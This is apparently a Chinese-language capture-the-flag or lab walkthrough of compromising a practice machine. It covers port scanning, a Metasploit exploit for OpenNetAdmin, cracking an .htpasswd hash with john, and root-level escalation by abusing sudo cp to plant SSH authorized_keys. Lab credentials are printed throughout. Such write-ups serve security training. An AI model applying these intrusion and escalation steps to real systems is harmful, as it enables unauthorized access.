针对目标机器,先扫描找出靶机然后再扫端口查看服务
Nmap -Pn ip网段
是用nmap -A -p- -T4 192.168.127.130
查看详细的端口服务
上图可以得知:
- 22端口SSH服务开启(攻击方法有 针对第三方SSH软件版本漏洞的攻击 暴力破解 匿名登录 弱口令)
- 80端口是HTTP服务(网站的十大常规漏洞 第三方框架WORDPRESS之类 apache解析漏洞 还可以扫目录找到后台爆破 验证码绕过)
- 10000 是MiniSer一个从控制台或远程管理的系统
先打开网页,是空白页,扫目录
网站存在.htpasswd文件但是403无权限
打开roboot.txt文件查看
roboot.txt是指本网站的一个声明,声明网络爬虫不可以扫描这个文件里的目录(此地无银三百两)
进入这个/ona的目录
一开始也不知道这是什么系统,但是发现了软件名称和版本号
查询一下有无历史漏洞
小技巧:
碰到一些正在使用的第三方软件,都可以查询有无历史漏洞
.rb文件是可以添加到msf中的,先复制到桌面
cp /usr/share/exploitdb/exploits/php/webapps/47772.rb ./
怎么添加攻击载荷到msf中?
先查找一下msf的exploit文件夹在哪里
find / -name exploit
下面的路径是Kali中msf攻击载荷的文件夹
/opt/metasploit-framework/embedded/framework/modules/exploits
复制进去
启动msfconsole 加载全部载荷
msf5 > reload_all
使用刚刚添加的载荷
查看需要配置那些参数 凡是有yes的位置都要查看参数是否正确
使用Set命令配置
配置完成 攻击 获得一个session
python -c 'import pty;pty.spawn("/bin/bash")'
是否还记得一开始扫描目录的时候,有一个.htpasswd的文件但是显示403无权限(忘记了往上翻 在扫目录哪里)
一个3w文件的位置是 /var/www/目录下面
ls -lsa 显示目录的隐藏文件
根据提示制作一个字典(提示是下面的两行 我用的翻译)
把hash值放到hash.txt中
使用john开始破解
获得账号密码
douglas fatherrrrr
尝试登陆ssh
开始提权
这里使用sudo -l命令查看当前用户有哪些root权限,看到cp(复制命令被赋予root)
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/
cp /home/douglas/.ssh/id_rsa /tmp/
chmod 600 id_rsa
ssh jen@127.0.0.1
mail文件在/var/mail
用户名moss 密码 Fire!Fire!